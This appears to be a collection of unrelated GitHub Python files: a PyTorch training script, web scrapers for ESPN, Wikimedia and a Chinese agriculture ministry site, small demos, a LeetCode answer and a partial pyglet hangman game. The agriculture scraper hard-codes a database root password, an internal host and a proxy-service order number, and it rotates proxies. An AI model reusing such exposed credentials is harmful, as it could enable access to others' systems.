RAdam\n\n# Extra module\nfrom tqdm import tqdm\nimport argparse\n\n\n##############################\n# Constant Setting #\n##############################\nparser = argparse.ArgumentParser()\n\n## Hyper-parameter\nparser.add_argument(\"--gpu_id\", type=str, default='0')\nparser.add_argument(\"--batch_size\", type=int, default=12)\nparser.add_argument(\"--epochs\", type=int, default=50)\nparser.add_argument(\"--dataset\", type=str, default='vimeo90k')\nparser.add_argument(\"--data_root\", type=str, default='/data')\nparser.add_argument(\"--lr\", type=float, default=1e-5)\nparser.add_argument(\"--merge_lr\", type=float, default=1e-4)\n\n## Model related settings\nparser.add_argument(\"--sr_type\", type=str, choices=['ESPCN', 'SAN'])\nparser.add_argument(\"--it_type\", type=str, choices=['SSM', 'DAIN'])\nparser.add_argument(\"--merge_in\", type=int)\nparser.add_argument(\"--merge_out\", type=int)\nparser.add_argument(\"--two_mask\", action=\"store_true\")\nparser.add_argument(\"--refine_type\", type=str, default='resblock')\nparser.add_argument(\"--refine_in\", type=int, default=3)\nparser.add_argument(\"--input_R\", type=str, choices=['ST', 'TS', 'Both', 'Half', 'IFISTITS', '3timestamp'], default='Both')\nparser.add_argument(\"--stsr_weight\", type=str)\n\n## Training strategy\nparser.add_argument(\"--train_MsMt\", action='store_true')\nparser.add_argument(\"--train_F\", action='store_true')\nparser.add_argument(\"--train_R\", action='store_true')\nparser.add_argument(\"--detach\", action='store_true')\nparser.add_argument(\"--seed\", type=int, default=0)\n\n## Other option\nparser.add_argument(\"--save_dir\", type=str, default='./results/')\n\nargs = parser.parse_args()\nprint(args)\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nsave_dir = os.path.join(args.save_dir)\nos.makedirs(save_dir, exist_ok=True)\nSPATIAL_SIZE = (64, 112)\nnn_down = nn.Upsample(scale_factor=0.5, mode='bicubic').to(device)\n\n\n## randomness\ntorch.manual_seed(args.seed)\nnp.random.seed(args.seed)\ntorch.backends.cudnn.deterministic = True\ntorch.backends.cudnn.benchmark = False\n\ndef main():\n # Load dataset & dataloader\n if args.dataset == 'vimeo90k':\n train_dataset = vimeo90k.Vimeo90kDataset(args.data_root, SPATIAL_SIZE, train=True)\n val_dataset = vimeo90k.Vimeo90kDataset(args.data_root, (64, 112), train=False)\n else:\n raise NotImplementedError('Not support other dataset now')\n\n train_loader = DataLoader(dataset=train_dataset, batch_size=args.batch_size, shuffle=True, num_workers=8, pin_memory=True, drop_last=True)\n val_loader = DataLoader(dataset=val_dataset, batch_size=24, shuffle=False, num_workers=8, pin_memory=True)\n \n # Load SR/interp model\n stsr = STSR(\n args.sr_type, None,\n args.it_type, None,\n args.merge_in, args.merge_out, None, args.two_mask,\n args.refine_type, args.refine_in, None, args.input_R,\n args.train_MsMt, args.train_F, args.train_R, args.detach\n )\n\n cri = nn.L1Loss().to(device)\n\n # set and load optimizer\n optimizer = stsr.get_optimizer(\n args.lr, args.merge_lr, args.train_MsMt, args.train_F, args.train_R\n )\n\n # Dataparallel and to device\n stsr = nn.DataParallel(stsr).to(device)\n \n _ = val_loop(stsr, val_loader, val_dataset, args.start_epoch)\n best_PSNR = 0\n for epoch in tqdm(range(args.start_epoch, args.epochs), desc='[EPOCH]'):\n record_TOTAL = []\n record_MERGE = []\n record_RESIDUAL = []\n record_SR = []\n record_IT = []\n record_SR_IT = []\n record_IT_SR = []\n record_WARP = []\n\n stsr.train()\n for _, train_data in enumerate(tqdm(train_loader, desc='[TRAIN]')):\n HR = train_data['HR'].to(device)\n LR = torch.stack([nn_down(HR[:, 0]), nn_down(HR[:, 1]), nn_down(HR[:, 2])], dim=1)\n LR = LR.clamp(0, 1).detach()\n GT = HR[:, 1]\n I_L_2, I_H_1, I_H_3, I_TS_2, I_ST_2, I_F_2, mask_1, mask_2, I_R_basic, I_R_2 = stsr(LR[:, 0], LR[:, 2])\n\n # calculate and record loss\n loss_total = 0\n if args.train_MsMt:\n loss_it = cri(I_L_2, LR[:, 1])\n loss_sr = 0.5*cri(I_H_1, HR[:, 0]) + 0.5*cri(I_H_3, HR[:, 2])\n loss_it_sr = cri(I_TS_2, HR[:, 1])\n loss_sr_it = cri(I_ST_2, HR[:, 1])\n loss_total += loss_it + loss_sr + loss_it_sr + loss_sr_it\n record_IT.append(loss_it.item())\n record_SR.append(loss_sr.item())\n record_SR_IT.append(loss_sr_it.item())\n record_IT_SR.append(loss_it_sr.item())\n\n if args.train_F:\n loss_merge = cri(I_F_2, GT)\n loss_total += loss_merge\n record_MERGE.append(loss_merge.item())\n\n if args.train_R:\n loss_residual = cri(I_R_2, GT)\n loss_total += loss_residual\n record_RESIDUAL.append(loss_residual.item())\n\n record_TOTAL.append(loss_total.item())\n\n optimizer.zero_grad()\n loss_total.backward()\n optimizer.step()\n\n loss_log = {\n 'Total Loss': np.mean(record_TOTAL)\n }\n\n if args.train_MsMt:\n loss_log['IT Loss'] = np.mean(record_IT)\n loss_log['SR Loss'] = np.mean(record_SR)\n loss_log['SR_IT Loss'] = np.mean(record_SR_IT)\n loss_log['IT_SR Loss'] = np.mean(record_IT_SR)\n \n if args.train_F:\n loss_log['MERGE Loss'] = np.mean(record_MERGE)\n\n if args.train_R:\n loss_log['Residual Loss'] = np.mean(record_RESIDUAL)\n\n if args.train_warp:\n loss_log['Warp Loss'] = np.mean(record_WARP)\n print(loss_log)\n\n ### validation\n avg_PSNR = val_loop(stsr, val_loader, val_dataset, epoch+1)\n utils.save_model(stsr, 'STSR', 'current', save_dir)\n if avg_PSNR > best_PSNR:\n best_PSNR = avg_PSNR\n utils.save_model(stsr, 'STSR', 'best', save_dir)\n\n if (epoch+1) % 5 == 0:\n utils.save_model(stsr, 'STSR', epoch+1, save_dir)\n torch.save(optimizer.state_dict(), os.path.join(save_dir, 'optimizer.pth'))\n\n\ndef val_loop(stsr, val_loader, val_dataset, epoch):\n ### validation\n avg_PSNR_TS = 0\n avg_PSNR_ST = 0\n avg_PSNR_MERGE = 0\n avg_PSNR_RESIDUAL = 0\n avg_PSNR_HR = 0\n avg_PSNR_LR = 0\n\n stsr.eval()\n\n\n with torch.no_grad():\n for vid, val_data in enumerate(tqdm(val_loader)):\n \"\"\"\n TEST CODE\n \"\"\"\n if args.train_MsMt:\n HR = val_data['HR'].to(device)\n LR = torch.stack([nn_down(HR[:, 0]), nn_down(HR[:, 1]), nn_down(HR[:, 2])], dim=1)\n LR = LR.clamp(0, 1).detach()\n GT = HR[:, 1]\n I_L_2, I_H_1, I_H_3, I_TS_2, I_ST_2, I_F_2, mask_1, mask_2, I_R_basic, I_R_2 = stsr(LR[:, 0], LR[:, 2])\n else:\n ST = val_data['ST'].to(device)\n TS = val_data['TS'].to(device)\n GT = val_data['GT'].to(device)\n I_L_2, I_H_1, I_H_3, I_TS_2, I_ST_2, I_F_2, mask_1, mask_2, I_R_basic, I_R_2 = stsr(ST, TS)\n\n B, C, H, W = GT.size()\n \n\n for b_id in range(B):\n avg_PSNR_MERGE += utils.cal_psnr(I_R_basic[b_id], GT[b_id]).item()\n avg_PSNR_RESIDUAL += utils.cal_psnr(I_R_2[b_id], GT[b_id]).item()\n avg_PSNR_TS += utils.cal_psnr(I_TS_2[b_id], GT[b_id]).item()\n avg_PSNR_ST += utils.cal_psnr(I_ST_2[b_id], GT[b_id]).item()\n if args.train_MsMt:\n avg_PSNR_HR += utils.cal_psnr(I_H_1[b_id], HR[b_id, 0]).item()+utils.cal_psnr(I_H_3[b_id], HR[b_id, 2]).item()\n avg_PSNR_LR += utils.cal_psnr(I_L_2[b_id], LR[b_id, 1]).item()\n\n\n log = {\n 'PSNR_TS': avg_PSNR_TS/len(val_dataset),\n 'PSNR_ST': avg_PSNR_ST/len(val_dataset),\n 'PSNR_MERGE': avg_PSNR_MERGE/len(val_dataset),\n 'PSNR_RESIDUAL': avg_PSNR_RESIDUAL/len(val_dataset)\n }\n if args.train_MsMt:\n log['PSNR_HR'] = avg_PSNR_HR/len(val_dataset)/2.\n log['PSNR_LR'] = avg_PSNR_LR/len(val_dataset)\n print(log)\n \n return avg_PSNR_RESIDUAL/len(val_dataset)\n\n\n\nif __name__ == '__main__':\n main()","repo_name":"TMYuan/Dual-Stream-Fusion-Network","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8996,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"33642105900","text":"\n# YOUR CODE HERE\n#raise NotImplementedError()\nimport requests\nimport re\nfrom requests.exceptions import HTTPError\nfrom bs4 import BeautifulSoup\n\ndef get_team_url(team_id, team_name):\n url = \"https://www.espn.com/college-football/team/roster/_/id/\" + str(team_id) + \"/\"\n real_team_name = team_name.split( )\n #print(real_team_name)\n i = 1\n while (len(real_team_name) > i): \n url = url + real_team_name[i-1].lower()+\"-\"\n i = i + 1\n else: \n url = url + real_team_name[i-1].lower()\n return url\n\ndef extract_team_roster(team_id, team_name):\n \"\"\"\n Extract the team roster for a NCAA college football team\n \n Args:\n team_id: the id of a NACC football team assigned by ESPN\n team_name: the name of the football team\n \n Returns:\n a list of dict representing the roster of the entire team.\n \"\"\"\n #team_id = 150\n #team_name = \"Duke Blue Devils\"\n roster = []\n def mysplit(s, ex):\n head = s.rstrip(ex)\n tail = s[len(head):]\n return head, tail\n \n def is_player_row(tag):\n if tag.name == 'tr' and tag.has_attr('data-idx'):\n return True\n return False\n \n #Computing Team URL\n url = get_team_url(team_id, team_name)\n\n #Create a BeautifulSoup Object\n response = requests.get(url)\n html = response.content\n soup = BeautifulSoup(html, 'html.parser')\n \n #Finding Team Name\n team_tag = soup.find('h1', string=re.compile(' Roster$'))\n \n #Searching For Team Group\n groups = soup.find_all(class_=\"Table__Title\", string=[\"Offense\", \"Defense\", \"Special Teams\"])\n #print(len(groups), \"groups\")\n #for g in groups:\n #print(g)\n \n #Finding the Column Names\n col_names = []\n for g in groups:\n t = g.find_next(\"table\")\n for c in t.thead.tr.children:\n col_names.append(c.text)\n \n #Find the Attributes of a Player\n players = []\n id_list = []\n for x in groups :\n table = x.find_next(\"table\")\n for c in table.tbody.find_all(is_player_row):\n tds = c.find_all('td')\n cols = []\n for td in tds:\n cols.append(td.get_text())\n players.append(cols)\n for aPlayer in players :\n player = {}\n name = mysplit(aPlayer[1], '0123456789')\n player[\"player_name\"] = name[0]\n \n player_url_name = name[0].split()\n #print(player_url_name)\n totalURL = \"\"\n i = 1\n for x in player_url_name :\n #print(x)\n if i != len(player_url_name) :\n if x.find(\".\") :\n x = x.replace('.', '') \n if x.find('\\'') :\n #print(x)\n x = x.replace('\\'', '') \n if x.find(',') :\n x = x.replace(',', '')\n #print(x)\n totalURL = totalURL + x.lower() + \"-\"\n else :\n if x.find(\".\") :\n x = x.replace('.', '')\n if x.find('\\'') :\n #print(x)\n x = x.replace('\\'', '') \n if x.find(',') :\n x = x.replace(',', '')\n if x != '' :\n #print(x)\n totalURL = totalURL + x.lower()\n i = i + 1\n totalURL = '/' + totalURL\n #print(totalURL)\n #print(soup.find('a', href=re.compile(totalURL))['href'])\n id = soup.find('a', href=re.compile(totalURL))['href']\n id = re.sub('http://www.espn.com/college-football/player/_/id/', '', id)\n id = re.sub(totalURL, '', id)\n if id_list.count(id) == 0: \n id_list.append(id)\n player[\"player_id\"] = id\n if name[1] == '' :\n player[\"player_no\"] = \"NA\"\n else :\n player[\"player_no\"] = name[1]\n player[\"POS\"] = aPlayer[2]\n player[\"HT\"] = aPlayer[3]\n player[\"WT\"] = aPlayer[4]\n player[\"Class\"] = aPlayer[5]\n player[\"Birthplace\"] = aPlayer[6]\n #print(player)\n roster.append(player)\n \n # YOUR CODE HERE\n #raise NotImplementedError()\n return roster\n","repo_name":"joshlin5/cpsc6300ps3backup","sub_path":"ps01/roster.py","file_name":"roster.py","file_ext":"py","file_size_in_byte":4469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"21705413729","text":"#!/usr/bin/env python3\n# utf-8\n\n'''\ndemo for the following base-N functions:\n base58\n base64\n base85\n'''\n\nimport sys\nimport base64\nfrom random import randint\nimport numpy as np\n\ntry:\n import base58\nexcept ImportError:\n print('cannot import module: base58')\n sys.exit(1)\n\ndef int_to_bytes(x: int) -> bytes:\n ''' int to bytes '''\n return x.to_bytes((x.bit_length() + 7) // 8, 'big')\n\ndef int_from_bytes(xbytes: bytes) -> int:\n ''' int from bytes '''\n r = int.from_bytes(xbytes, byteorder='big')\n return r\n\ndef fill_bytearray(size: int = 24) -> bytes:\n ''' fill byte array '''\n return np.random.bytes(size)\n\n\ndef test(v: bytes):\n ''' test '''\n\n def show(m, n):\n ''' show '''\n print(f'{m:<14s}: {n}')\n\n #hx = binascii.hexlify(v) # bytes: b'([0-9a-f][0-9a-f])+'\n #show('input', hx)\n hxx = v.hex() # str: ([0-9a-f][0-9a-f])+\n show('input hex', hxx)\n #b16 = base64.b16encode(v) # bytes: b'([0-9A-F][0-9A-F])+'\n #show('b16encode', b16)\n print('-' * 60)\n\n r0 = base64.standard_b64encode(v)\n r1 = base64.b64encode(v)\n r2 = base64.urlsafe_b64encode(v)\n\n if r0 != r1:\n show('std base64', r0)\n show('base64', r1)\n\n if r1 != r2:\n show('urlsafe base64', r2)\n\n print('-' * 60)\n r = base64.a85encode(v)\n show('base85a', r)\n r = base64.b85encode(v)\n show('base85b', r)\n\n print('-' * 60)\n r = base58.b58encode(v)\n show('base58', r)\n\n\ndef main(argv):\n ''' main '''\n if argv == []:\n for _ in range(1):\n x = fill_bytearray(randint(10, 40))\n argv.append(x)\n\n for e in argv:\n try:\n if isinstance(e, str):\n v = e.encode('utf-8')\n elif isinstance(e, int):\n v = int_to_bytes(e)\n elif isinstance(e, bytes):\n v = e\n else:\n v = bytes(e)\n\n test(v)\n print()\n except ValueError:\n print(f'invalid input: {e}')\n\n\nif __name__ == '__main__':\n main(sys.argv[1:])\n","repo_name":"ericosur/ericosur-snippet","sub_path":"python3/b6485.py","file_name":"b6485.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"34138397363","text":"#\n# @lc app=leetcode id=83 lang=python3\n#\n# [83] Remove Duplicates from Sorted List\n#\n# https://leetcode.com/problems/remove-duplicates-from-sorted-list/description/\n#\n# algorithms\n# Easy (42.71%)\n# Total Accepted: 336.7K\n# Total Submissions: 786.7K\n# Testcase Example: '[1,1,2]'\n#\n# Given a sorted linked list, delete all duplicates such that each element\n# appear only once.\n# \n# Example 1:\n# \n# \n# Input: 1->1->2\n# Output: 1->2\n# \n# \n# Example 2:\n# \n# \n# Input: 1->1->2->3->3\n# Output: 1->2->3\n# \n# \n#\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n # def deleteDuplicates(self, head: ListNode) -> ListNode:\n def deleteDuplicates(self, head):\n if not head:\n return None\n n = head\n while n and n.next:\n if n.val == n.next.val:\n if n.next.next:\n n.next = n.next.next\n else:\n n.next = None\n else:\n n = n.next\n return head\n\n\n\n","repo_name":"nickyfoto/lc","sub_path":"python/83.remove-duplicates-from-sorted-list.py","file_name":"83.remove-duplicates-from-sorted-list.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"19453127932","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nfrom webdriver_manager.chrome import ChromeDriverManager\n\nfrom selenium.webdriver.common.by import By\n\nimport time\n\ntravel = 'https://commons.wikimedia.org/w/index.php?title=Special:ListFiles&limit=500&user=Designermadsen'\nhome = 'https://commons.wikimedia.org/wiki/Main_Page'\n\n\nred_url = 'https://commons.wikimedia.org/wiki/'\nlengthOfRed = len(red_url)\n\nFound = []\n\n\ndef print_result():\n global Found, lengthOfRed\n\n print('size:')\n print(len(Found))\n\n for e in Found:\n print(e[lengthOfRed:])\n\n\ndef is_in_found( value ):\n global Found\n\n for e in Found:\n if str(e) == str(value):\n return True\n\n return False\n\n\ndef file_format_png(link):\n StrVal = str(link).lower()\n\n if '.png' in StrVal:\n return True\n\n return False\n\n\ndef file_format_jpeg(link):\n StrVal = str(link).lower()\n\n if '.jpeg' in StrVal:\n return True\n\n if '.jpg' in StrVal:\n return True\n\n return False\n\n\ndef only_file(link):\n StrVal = str(link).lower()\n\n if 'file:' in StrVal:\n return True\n\n return False\n\n\ndef find_links(driver):\n global lengthOfRed, Found\n found_elements = driver.find_elements(By.TAG_NAME, 'a')\n\n for e in found_elements:\n href = e.get_attribute('href')\n\n if not href is None:\n if only_file(href):\n sliced = str(href)\n\n if not is_in_found( sliced ):\n Found.append( sliced )\n\n\ndef main():\n global travel\n\n DriverService = Service(ChromeDriverManager().install())\n Driver = webdriver.Chrome(service=DriverService)\n\n Driver.get(travel)\n stop = False\n\n while not stop:\n found = Driver.find_elements(By.TAG_NAME, 'a')\n\n find_links(Driver)\n time.sleep(5)\n\n # Get State\n for eF in found:\n if eF.get_attribute( 'class' ) == 'oo-ui-buttonElement-button':\n if eF.text == 'Next page':\n if eF.get_attribute('aria-disabled') == 'true':\n stop = True\n break\n else:\n eF.click()\n break\n\n print_result()\n\n\n\nif __name__ == '__main__':\n main()","repo_name":"KentMadsen-Hobby/Wikicommons-Bot","sub_path":"collect/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"10175909734","text":"from composabl.core import Agent, Skill, Sensor, Scenario\nfrom composabl.ray import Runtime\nfrom teacher import CSTRTeacher\n\nfrom composabl import Controller\n\nimport os\nimport numpy as np\n\nos.environ[\"COMPOSABL_EULA_AGREED\"] = \"1\"\nlicense_key = os.environ[\"COMPOSABL_LICENSE\"]\n\n\ndef start():\n T = Sensor(\"T\", \"\")\n Tc = Sensor(\"Tc\", \"\")\n Ca = Sensor(\"Ca\", \"\")\n Cref = Sensor(\"Cref\", \"\")\n Tref = Sensor(\"Tref\", \"\")\n\n sensors = [T, Tc, Ca, Cref, Tref]\n\n # Cref_signal is a configuration variable for Concentration and Temperature setpoints\n control_scenarios = [\n {\n \"Cref_signal\": \"complete\",\n \"noise_percentage\": 0.0\n }\n ]\n\n control_skill = Skill(\"control\", CSTRTeacher)\n for scenario_dict in control_scenarios:\n control_skill.add_scenario(Scenario(scenario_dict))\n\n config = {\n \"license\": license_key,\n \"target\": {\n \"local\": {\n \"address\": \"localhost:1337\"\n }\n },\n \"env\": {\n \"name\": \"sim-cstr\",\n },\n\n \"flags\": {\n \"print_debug_info\": True\n },\n }\n\n runtime = Runtime(config)\n agent = Agent()\n agent.add_sensors(sensors)\n\n agent.add_skill(control_skill)\n\n checkpoint_path = './cstr/skill_group_drl_mpc/saved_agents/'\n\n try:\n files = os.listdir(PATH_CHECKPOINTS)\n\n if '.DS_Store' in files:\n files.remove('.DS_Store')\n os.remove(PATH_CHECKPOINTS + '/.DS_Store')\n\n if len(files) > 0:\n agent.load(PATH_CHECKPOINTS)\n\n except Exception:\n os.mkdir(PATH_CHECKPOINTS)\n\n runtime.train(agent, train_iters=1)\n\n #save agent\n agent.export(checkpoint_path)\n\nif __name__ == \"__main__\":\n start()\n","repo_name":"Composabl/examples.composabl.io","sub_path":"agents/cstr/skill_group_drl_mpc/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"26330833662","text":"# -*- encoding: utf-8 -*-\n#!/usr/bin/env python\n\n###\n# hello world\n###\n\n# 指定图像文件名称\nbackground_image_filename = '../images/sushiplate.jpg'\nmouse_image_filename = '../images/fugu.png'\n\n# 导入pygame库\nimport pygame\n# 导入一些常用的函数和常量\nfrom pygame.locals import *\n# 向sys模块借一个exit函数用来退出程序\nfrom sys import exit\n# 初始化pygame,为使用硬件做准备\npygame.init()\n\n'''\n创建了一个窗口\nset_mode会返回一个Surface对象,代表了在桌面上出现的那个窗口,\n三个参数第一个为元祖,代表分辨率(必须);第二个是一个标志位,具体意思见下表,如果不用什么特性,就指定0;第三个为色深。\n标志位\t功能\nFULLSCREEN\t创建一个全屏窗口\nDOUBLEBUF\t创建一个“双缓冲”窗口,建议在HWSURFACE或者OPENGL时使用\nHWSURFACE\t创建一个硬件加速的窗口,必须和FULLSCREEN同时使用\nOPENGL\t创建一个OPENGL渲染的窗口\nRESIZABLE\t创建一个可以改变大小的窗口\nNOFRAME\t创建一个没有边框的窗口\n'''\nscreen = pygame.display.set_mode((640, 480), 0, 32)\n# 设置窗口标题\npygame.display.set_caption(\"Hello, World!\")\n# 加载并转换图像\n# convert函数是将图像数据都转化为Surface对象,每次加载完图像以后就应该做这件事件(事实上因为 它太常用了,如果你不写pygame也会帮你做);\n# convert_alpha相比convert,保留了Alpha 通道信息(可以简单理解为透明的部分),这样我们的光标才可以是不规则的���状。\nbackground = pygame.image.load(background_image_filename).convert()\nmouse_cursor = pygame.image.load(mouse_image_filename).convert_alpha()\n\nwhile True:\n for event in pygame.event.get():\n if event.type == QUIT:\n exit()\n\n # 将背景图画上去\n # blit是个重要函数,第一个参数为一个Surface对象,第二个为左上角位置。\n screen.blit(background, (0,0))\n\n # 获得鼠标位置\n x, y = pygame.mouse.get_pos()\n \n # 计算光标的左上角位置\n x -= mouse_cursor.get_width() / 2\n y -= mouse_cursor.get_height() / 2\n \n # 把光标画上去\n screen.blit(mouse_cursor, (x, y))\n\n # 刷新一下画面(画完以后一定记得用update更新一下,否则画面一片漆黑。)\n pygame.display.update()","repo_name":"yanlinpu/information","sub_path":"python/pygames/lession1/hello_world.py","file_name":"hello_world.py","file_ext":"py","file_size_in_byte":2346,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"18496590644","text":"import NASprintsimulation as chat\r\nfrom utils import Video as UV\r\nfrom ExcelWrite import FileWrite as Write\r\nimport search\r\n\r\nToRename = []\r\nNamed = []\r\nother = []\r\nsortlist = []\r\nduplicate = []\r\noptional = []\r\nsortlength = 0\r\n\r\n\r\n\r\ni = 0\r\ndef AddSort(item):\r\n sortlist.append(item)\r\nclass Sorter:\r\n def main():\r\n sortlength = len(sortlist)\r\n print(\"Sorting: \" + str(sortlength)+ \" Files\")\r\n for i in range(0,sortlength):\r\n item = sortlist[i]\r\n Video,Extention = UV.Converter(item)\r\n exsits = UV.Revew.exsits(Video)\r\n if exsits:\r\n print(\"Item \"+ str(i+1) + \"/\"+str(sortlength)+ \" : \" + Video + \" : Already Exsits\")\r\n \r\n else:\r\n print(\"Item \"+ str(i+1) + \"/\"+str(sortlength)+ \" : \" + Video + \" : Doesnt Exsit\")\r\n Write(item,Extention)\r\n chat.Message(\"General\", \"Python Search Completed\")\r\n \r\n\r\nif __name__ == \"__main__\":\r\n search.run()","repo_name":"EmilyJonesAMST/AMST-Project","sub_path":"sorter.py","file_name":"sorter.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"14699037040","text":"from sys import *\r\n\r\ndef main():\r\n print(\"number of cmd line arguments are:\",len(argv))\r\n print(\"Name of application is :\",argv[0])\r\n \r\n for data in argv:\r\n print(data)\r\n \r\nif __name__==\"__main__\":\r\n main()","repo_name":"PrachiBorawake/Python_codes","sub_path":"Assignment2/cmd1.py","file_name":"cmd1.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"18621600420","text":"import random\nfrom datetime import datetime\n\nimport requests\nimport redis\nimport pymysql\n\n# 链接MySQL数据库\nconn = pymysql.Connect(host='10.10.107.7', user='root', password='xinqian@saibao', database='bigdata', port=3306)\ncursor = conn.cursor()\n# 链接Redis数据库\nredisDB = redis.Redis(host='127.0.0.1', port=6379, db=2)\n# 固定资产投资完成额变化\nredis_dict_key = 'ods_cnncnybgdzctzwcebhyd'\n\n\n# 获取讯代理IP\ndef getIp():\n xdl_url = 'http://api.xdaili.cn/xdaili-api//greatRecharge/getGreatIp?spiderId=913d4f4b67e24be0998a3eb344ff732b&orderno=YZ2021923652gUFZCj&returnType=2&count=10'\n ipListData = requests.get(url=xdl_url).json()\n ipList = []\n ipList.clear()\n # 将ip以字典的形式添加至ip池\n for everyIp in ipListData['RESULT']:\n ipList.append({\n 'ip': everyIp['ip'],\n 'port': everyIp['port']\n })\n return ipList\n\n\ndef insertMysql(item):\n if redisDB.hexists(redis_dict_key, item['completedInvestmentInFixedAssets'] + '-' + item['Ctime'] + '-' + item[\n 'primaryIndustry']):\n print('已存在该值,不作处理...')\n else:\n redisDB.hset(redis_dict_key, item['completedInvestmentInFixedAssets'] + '-' + item['Ctime'] + '-' + item[\n 'primaryIndustry'], 0)\n sql = 'insert into ods_chinanongcunnongyebugdzctzwcebhyd(classification,completedInvestmentInFixedAssets,Ctime,primaryIndustry,theSecondaryIndustry,theTertiaryIndustry,unit,insertTime)values (%s,%s,%s,%s,%s,%s,%s,%s)'\n cursor.execute(sql, (item['classification'],\n item['completedInvestmentInFixedAssets'], item['Ctime'], item['primaryIndustry'],\n item['theSecondaryIndustry'],\n item['theTertiaryIndustry'], item['unit'], item['insertTime']))\n print('正在插入数据,请稍等...')\n conn.commit()\n\n\ndef getData():\n url = 'http://zdscxx.moa.gov.cn:8080/nyb/qggdzctz'\n item = {}\n headers = {\n 'Referer': 'http://zdscxx.moa.gov.cn:8080/nyb/pc/index.jsp',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.8 Safari/537.36',\n 'X-Requested-With': 'XMLHttpRequest',\n }\n data = {\n 'item': '月度'\n }\n ip = random.choice(ipList)\n response = requests.post(url=url, headers=headers, data=data,\n proxies={'http': 'http://' + ip['ip'] + ':' + ip['port']}).json()['result']['rowDatas']\n item['classification'] = '月度'\n for perData in response:\n # 固定资产投资完成额\n item['completedInvestmentInFixedAssets'] = perData['固定资产投资完成额']\n # 时间\n item['Ctime'] = perData['时间']\n try:\n # 第一产业\n item['primaryIndustry'] = perData['第一产业']\n except:\n item['primaryIndustry'] = ''\n try:\n # 第二产业\n item['theSecondaryIndustry'] = perData['第二产业']\n except:\n item['theSecondaryIndustry'] = ''\n try:\n # 第三产业\n item['theTertiaryIndustry'] = perData['第三产业']\n except:\n item['theTertiaryIndustry'] = ''\n # 单位\n item['unit'] = '亿元'\n # 插入时间\n item['insertTime'] = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n insertMysql(item)\n\n\nif __name__ == '__main__':\n ipList = getIp()\n getData()\n cursor.close()\n conn.close()\n","repo_name":"CuiXiangTuT/MyProject","sub_path":"WebCrawler/中华人民共和国农业农村部/2_宏观经济_固定资产投资完成额变化月度.py","file_name":"2_宏观经济_固定资产投资完成额变化月度.py","file_ext":"py","file_size_in_byte":3538,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"17692541762","text":"import pyglet\nfrom pyglet import shapes\nimport string\nimport random\n\nwindow = pyglet.window.Window(width=1280, height=720)\n\nclass Game:\n def __init__(self, correct_word):\n self.correct_word = correct_word\n self.word = ['_' for _ in self.correct_word]\n self.word_label = pyglet.text.Label()\n\n self.wrong_attemps = list()\n self.wrong_attemps_label = pyglet.text.Label()\n\n self.hang = pyglet.graphics.Batch()\n self.hangman = pyglet.graphics.Batch()\n\n self.__update_label()\n\n def __update_label(self):\n self.word_label = pyglet.text.Label(\n ''.join(self.word),\n font_name = 'Fira Code',\n font_size = 36,\n x = window.width // 2,\n y = window.height // 2,\n anchor_x = 'center',\n anchor_y = 'center'\n )\n\n self.wrong_attemps_label = pyglet.text.Label(\n ''.join(self.wrong_attemps),\n font_name = 'Fira Code',\n font_size = 36,\n x = window.width // 2,\n y = window.height // 2 - 220,\n anchor_x = 'center',\n anchor_y = 'center'\n )\n\n def key_pressed(self, letter):\n if letter in self.word or letter in self.wrong_attemps:\n return\n\n match = False\n for i in range(len(self.correct_word)):\n if self.correct_word[i] == letter:\n self.word[i] = letter\n match = True\n\n if not match:\n self.wrong_attemps.append(letter)\n\n self.__update_label()\n\n def draw_hang(self):\n x = window.width // 2 - 300\n y = window.height // 2 - 120\n\n line_1 = shapes.Line(x, y, x, y + 300, width=5, color=(255, 255, 255), batch=self.hang)\n line_2 = shapes.Line(x, y + 300, x + 100, y + 300, width=5, color=(255, 255, 255), batch=self.hang)\n line_3 = shapes.Line(x + 100, y + 300, x + 100, y + 270, width=5, color=(255, 255, 255), batch=self.hang)\n\n self.hang.draw()\n\n def draw_hangman(self):\n x = window.width // 2 - 200\n y = window.height // 2 + 120\n\n wrong_count = len(self.wrong_attemps)\n\n if wrong_count > 0:\n head = shapes.Circle(x, y, 30, color=(255, 255, 255), batch=self.hangman)\n\n if wrong_count > 1:\n body = shapes.Line(x, y, x, y - 120, width=5, color=(255, 255, 255), batch=self.hangman)\n\n if wrong_count > 2:\n arm_1 = shapes.Line(x, y - 50, x - 40, y - 100, width=5, color=(255, 255, 255), batch=self.hangman)\n\n if wrong_count > 3:\n arm_2 = shapes.Line(x, y - 50, x + 40, y - 100, width=5, color=(255, 255, 255), batch=self.hangman)\n\n if wrong_count > 4:\n leg_1 = shapes.Line(x, y - 120, x - 40, y - 200, width=5, color=(255, 255, 255), batch=self.hangman)\n\n if wrong_count > 5:\n leg_2 = shapes.Line(x, y - 120, x + 40, y - 200, width=5, color=(255, 255, 255), batch=self.hangman)\n\n 